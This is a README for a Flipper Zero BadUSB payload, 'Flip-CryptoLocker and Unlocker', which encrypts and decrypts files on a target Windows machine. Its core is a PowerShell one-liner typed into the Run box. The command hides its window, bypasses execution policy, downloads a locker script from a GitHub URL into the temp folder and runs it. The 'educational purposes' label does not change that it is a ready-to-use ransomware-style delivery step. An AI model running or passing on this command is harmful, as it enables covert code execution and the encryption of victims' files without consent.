3.7 KiB
3.7 KiB

Table of Contents
Flip-CryptoLocker and Unlocker
Scripts designed for educational purposes to encrypt and decrypt files on a target machine.
Description
The Flip-CryptoLocker
script encrypts files on the user's machine while the Flip-CryptoUnlocker
decrypts them. These scripts are designed purely for educational and demonstration purposes.
Getting Started
Dependencies
- An internet connection
- Windows 10,11
Executing program
- Plug in your device
- Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1' -O "$D\locker.ps1"; & "$D\locker.ps1"
Contributing
ooovenenoso
Version History
- 0.1
- Initial Release
Contact
📱 My Socials 📱
Acknowledgments